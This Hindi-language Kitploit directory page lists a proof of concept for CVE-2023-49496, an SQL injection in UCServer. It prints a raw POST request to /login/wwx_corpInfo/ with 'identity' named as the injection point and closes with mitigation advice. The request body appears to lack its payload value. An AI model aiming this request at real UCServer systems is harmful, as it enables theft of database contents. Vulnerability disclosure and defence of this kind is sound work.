Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2023-49496_PoC — CVE-2023-49496 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो UCServer में /login/wwx_corpInfo/ एंडपॉइंट के माध्यम से SQL इंजेक्शन का प्रदर्शन करता है और संवेदनशील डेटाबेस जानकारी निकालता है। | Kitploit
उपकरण/GitHubGitHub/huangyanqwq/cve-2023-49496_poc
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगगलत कॉन्फ़िगरेशनडेटाबेस सुरक्षा
GitHubhuangyanqwq/cve-2023-49496_poc

CVE-2023-49496_PoC

CVE-2023-49496 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो UCServer में /login/wwx_corpInfo/ एंडपॉइंट के माध्यम से SQL इंजेक्शन का प्रदर्शन करता है और संवेदनशील डेटाबेस जानकारी निकालता है।

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
1 साल पहलेअभी तक समीक्षित नहीं

CVE-2023-49496_PoC

विवरण

UCServer एक उन्नत एकीकृत संचार सर्वर है। शंघाई शुपिन सूचना प्रौद्योगिकी कंपनी लिमिटेड के UCServer में SQL इंजेक्शन भेद्यता मौजूद है, जिसका उपयोग करके हमलावर डेटाबेस की संवेदनशील जानकारी प्राप्त कर सकता है।

POC

root@kitploit:~
POST /login/wwx_corpInfo/ HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
Referer: http://example.com/
Content-Length: 132
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
Host: example.com
Proxy-Connection: Keep-alive

&identity=

प्रदर्शन

POST अनुरोध बॉडी में "identity" इंजेक्शन बिंदु है

अस्थायी समाधान

वेबसाइट फ़ायरवॉल चालू करें; किसी भी IP को "/login/wwx_corpInfo/" पथ तक पहुँचने से रोकें; डेटाबेस को बाहरी दूरस्थ कनेक्शन स्वीकार करने से रोकें; डेटाबेस संस्करण को अपग्रेड करें।

टूल डाउनलोड करें